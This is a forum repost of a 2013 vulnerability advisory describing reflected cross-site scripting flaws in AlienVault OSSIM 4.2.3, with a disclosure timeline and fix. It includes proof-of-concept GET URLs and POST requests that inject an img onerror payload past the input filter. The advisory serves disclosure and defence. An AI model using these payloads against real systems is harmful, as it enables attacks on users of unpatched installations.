Matt Posted July 26, 2013 Report Posted July 26, 2013 Description : Alienvault OSSIM versions prior to 4.3.0 suffer from multiple reflective cross site scripting vulnerabilities.Author : xistenceSource : Alienvault OSSIM Cross Site Scripting ? Packet StormCode : # Title: Alienvault OSSIM Open Source SIEM 4.2.3 Multiple Reflected XSS Vulnerabilities# Date: July 25, 2013# Author: xistence ( xistence[@]0x90[.]nl )# Vendor: AlienVault# Vendor URL: http://www.alienvault.com# Reported: June 24, 2013# Fix: Upgrade to version 4.3.0Timeline:---------24 Jun 2013: Vulnerability Reported to AlienVault25 Jul 2013: Still no Vendor response.xx Jul 2013: Vendor has released version 4.3.0. Version 4.3.0 is notvulnerable to these vulnerability, probably fixed by vendor.25 Jul 2013: Public DisclosureVendor Description:-------------------AlienVault's open source SIEM project, OSSIM, created in 2003, is the mostwidely used SIEM offering with over 195,000 downloads in 175 countries.OSSIM provides all of the features that a security professional needs froma SIEM offering event collection, normalization, and correlation.Established and launched by security engineers out of necessity, OSSIM wascreated with an understanding of the reality many security professionalsface: a SIEM is useless without the basic security controls necessary forsecurity visibility. OSSIM addresses this reality by providing theessential security capabilities built into a unified platform. Standing onthe shoulders of the many proven open source security controls builtinto the platform, OSSIM continues to be the fastest way to make the firststeps towards unified security visibility.AlienVault provides ongoing development for OSSIM because we believe thateveryone should have access to sophisticated security technologies;this includes the researchers who need a platform for experimentation, andthe unsung heroes who can't convince their companies that security is aproblem.Vulnerability Details:----------------------OSSIM 4.2.3 and lower is vulnerable to multiple reflected cross sitescripting (XSS) vulnerabilities. The PHP code does seem to sanitize a lot ofinput to protect against XSS/SQLi/etc. such as disallowing <script> codetags. However, it's possible to inject <img src=a onerror=[javascriptcode]>to execute javascript code on the client browser. Below are the reflectedXSS vulnerabilities.[ 0x01 - Reflected XSS GET ]https://<IP>/ossim/vulnmeter/index.php?withoutmenu=%22%3E%3Cimg%20src%3da%20onerror%3dalert%28%27XSS%27%29%3Ehttps://<IP>/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu="><img%20src%3da%20onerror%3dalert('XSS')>https://<IP>/ossim/av_inventory/task_edit.php?section="><img%20src%3da%20onerror%3dalert('XSS')>https://<IP>/ossim/nfsen/rrdgraph.php?cmd=get-detailsgraph&profile=<img%20src%3da%20onerror%3dalert('XSS')>[ 0x02 - Reflected XSS POST request #1 ]POST /ossim/vulnmeter/simulate.php HTTP/1.1Host: <IP>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0)Gecko/20100101 Firefox/21.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: https://<IP>/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu=1Content-Length: 72Cookie: JXID=blahblah; JXHID=false; PHPSESSID=blahblahConnection: keep-alivePragma: no-cacheCache-Control: no-cachehosts_alive=1&scan_locally=1¬_resolve=0&scan_server=<img%20src%3da%20onerror%3dalert('XSS')>&targets=blah[ 0x03 - Reflected XSS POST request #2 ]POST /ossim/vulnmeter/simulate.php HTTP/1.1Host: <IP>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0)Gecko/20100101 Firefox/21.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: https://<IP>/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu=1Content-Length: 72Cookie: JXID=blahblah; JXHID=false; PHPSESSID=blahblahConnection: keep-alivePragma: no-cacheCache-Control: no-cachehosts_alive=1&scan_locally=1¬_resolve=0&scan_server=Null&targets=blah<img%20src%3da%20onerror%3dalert('XSS')> Quote